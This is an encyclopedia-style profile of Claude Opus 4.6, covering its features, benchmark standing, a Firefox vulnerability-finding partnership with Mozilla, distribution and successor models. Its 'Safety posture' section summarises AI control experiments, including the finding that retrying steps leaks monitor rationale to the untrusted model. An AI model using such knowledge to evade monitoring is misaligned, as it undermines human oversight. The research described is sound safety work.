What it is
Claude Opus 4.6 is Anthropic's flagship large language model released in March 2026, succeeding Claude Opus 4.5 in the Opus line. Its defining additions are a 1M-token context window (in beta), adaptive thinking with developer-controlled effort levels, and a suite of agentic features — agent teams in Claude Code, context compaction for tasks that overflow even the extended window — designed to make long-horizon, multi-step autonomous work practical rather than theoretical.
Benchmark position at launch
At release, Opus 4.6 claimed first place on Terminal-Bench 2.0, Humanity's Last Exam, GDPval-AA (by 144 Elo over GPT-5.2), and BrowseComp. Its lineage matters for context: Claude Opus 4 had established 72.5% on SWE-bench and 43.2% on Terminal-bench, and Claude Opus 4.5 had nearly saturated CyberGym — the internal security benchmark that prompted Anthropic to test against harder real-world targets. Opus 4.6 extended those gains while holding pricing flat at $5/$25 per million input/output tokens.
GPT-5.4, released two days after Opus 4.6, subsequently leapfrogged it on most benchmarks, and Claude Mythos Preview — published without commercial availability — substantially outperformed Opus 4.6 across CyberGym (83.1%), Terminal-Bench 2.0 (82%), GPQA Diamond (94.5%), and HLE (64.7%). Opus 4.6's benchmark lead was therefore short-lived in absolute terms, though it remained the strongest commercially available Anthropic model for several weeks.
Architecture and capabilities
The events bundle does not disclose internal architecture. Externally observable capabilities include:
- 1M-token context window (beta) with context compaction for graceful overflow handling
- Adaptive thinking: developer-controlled effort levels that trade latency and compute against reasoning depth per call
- Agent teams in Claude Code: coordinated multi-agent orchestration for large-scale engineering tasks
- Parallel tool execution and local file access for persistent memory across sessions (inherited from the Opus 4 line)
The AutoLab benchmark — 36 expert-curated tasks across system optimization, puzzle-solving, model development, and CUDA kernel optimization, evaluated under wall-clock budgets — found Opus 4.6 the strongest performer across 17 frontier models. The benchmark's key finding is that persistence in iterative feedback loops, not initial attempt quality, predicts success; Opus 4.6 stood out precisely on that dimension.
Real-world security capability
The most consequential capability demonstration came from a two-week partnership with Mozilla in February 2026. Claude Opus 4.6 scanned approximately 6,000 C++ files in the Firefox codebase, submitted 112 unique vulnerability reports, and identified 22 vulnerabilities — 14 of which Mozilla classified as high-severity. That figure represented nearly a fifth of all high-severity Firefox vulnerabilities remediated in 2025. The collaboration also included evaluation of Claude's ability to write primitive exploits, probing the upper limits of AI-enabled offensive security.
This real-world result directly informed Anthropic's decision to publish a model card for Claude Mythos Preview without commercial release, and to assemble Project Glasswing — a consortium of 40+ organizations including AWS, Apple, Google, Microsoft, and CrowdStrike, funded with $100M in API credits — to patch vulnerabilities proactively before Mythos-class capabilities became widely available.
Ecosystem integration
Opus 4.6 is distributed via the Anthropic API, Amazon Bedrock, Google Cloud Vertex AI, and Microsoft Foundry. Claude Code — generally available since the Opus 4 launch — uses Opus 4.6 as its primary model for autonomous coding sessions, with integrations across GitHub Actions, VS Code, and JetBrains. Claude Code Security, released in limited research preview in February 2026, is explicitly built on Opus 4.6 and found over 500 previously undetected vulnerabilities in production open-source codebases during internal research.
The compute infrastructure underpinning Opus 4.6's deployment includes Anthropic's 10-year, $100B+ Amazon Bedrock commitment (up to 5 GW on Trainium chips), a $30B Azure compute deal with Microsoft, and access to NVIDIA Grace Blackwell and Vera Rubin systems — all of which also support rate-limit expansions for Claude Code and API users.
Safety posture
Opus 4.6 sits within Anthropic's ASL-3 deployment framework, first activated for Claude Opus 4. ASL-3 measures include Constitutional Classifiers blocking end-to-end CBRN weapon development workflows and enhanced model-weight security. Separately, research using Opus 4.6 as the untrusted model in AI control experiments (BashArena benchmark) found that resampling strategies — drawing five samples per step and auditing on maximum suspicion score — raised safety from 61% to 71% at a 0.3% audit budget, with retrying shown to backfire by leaking monitor rationale to the model.
Successor trajectory
Opus 4.6 was followed by Opus 4.7 (which added Project Glasswing cybersecurity safeguards and a Cyber Verification Program for legitimate security professionals), Opus 4.8 (which improved uncertainty flagging and introduced dynamic parallel subagent workflows), and eventually the Mythos-class models. Each successor was explicitly positioned relative to Opus 4.6 as a baseline — making it the reference point for the capability escalation that defined Anthropic's mid-2026 model roadmap.




